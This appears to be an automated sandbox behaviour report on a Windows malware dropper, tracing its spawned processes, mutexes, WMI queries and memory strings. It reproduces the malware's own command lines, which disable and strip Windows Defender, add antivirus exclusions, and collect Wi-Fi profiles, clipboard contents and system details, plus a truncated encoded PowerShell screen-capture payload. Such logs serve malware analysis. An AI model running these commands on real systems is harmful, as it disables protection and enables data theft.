Code function: 0_2_00DAC652 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00DAC652

Source: C:\ProgramData\setup.exe

File created: C:\Program Files\Google\Chrome\updater.exe

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe

File created: C:\Users\user\Desktop\xnytOABw.log

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Recovery\HpQPPZazcv.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1148:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7424:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6944:120:WilError_03
Source: C:\ProgramData\Microsoft\based.exe	Mutant created: \Sessions\1\BaseNamedObjects\J
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5852:120:WilError_03
Source: C:\Recovery\HpQPPZazcv.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\3e64fe795a96f6df9d1018608996331101f86f90de28dc67ad34401869b49857
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3272:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7044:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03

Source: C:\ProgramData\Microsoft\hacn.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI66162

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Command line argument: sfxname	0_2_00DB037C
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Command line argument: sfxstime	0_2_00DB037C
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Command line argument: STARTDLG	0_2_00DB037C

Source: 8Ck8T5qRcC.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: based.exe, 00000004.00000002.2397463940.00007FFDFF191000.00000040.00000001.01000000.00000015.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: based.exe, based.exe, 00000004.00000002.2397463940.00007FFDFF191000.00000040.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: based.exe, based.exe, 00000004.00000002.2397463940.00007FFDFF191000.00000040.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: based.exe, based.exe, 00000004.00000002.2397463940.00007FFDFF191000.00000040.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: based.exe, based.exe, 00000004.00000002.2397463940.00007FFDFF191000.00000040.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: based.exe, based.exe, 00000004.00000002.2397463940.00007FFDFF191000.00000040.00000001.01000000.00000015.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: based.exe, based.exe, 00000004.00000002.2397463940.00007FFDFF191000.00000040.00000001.01000000.00000015.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: 8Ck8T5qRcC.exe	ReversingLabs: Detection: 52%
Source: 8Ck8T5qRcC.exe	Virustotal: Detection: 37%

Source: based.exe	String found in binary or memory: id-cmc-addExtensions
Source: based.exe	String found in binary or memory: set-addPolicy
Source: based.exe	String found in binary or memory: can't send non-None value to a just-started generator
Source: based.exe	String found in binary or memory: --help
Source: based.exe	String found in binary or memory: --help

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe

File read: C:\Users\user\Desktop\8Ck8T5qRcC.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\8Ck8T5qRcC.exe "C:\Users\user\Desktop\8Ck8T5qRcC.exe"
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogym
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogym
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Process created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
Source: C:\ProgramData\svchost.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6DA.tmp" "c:\Windows\System32\CSC43F2928123D49B6B141C06767811123.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcg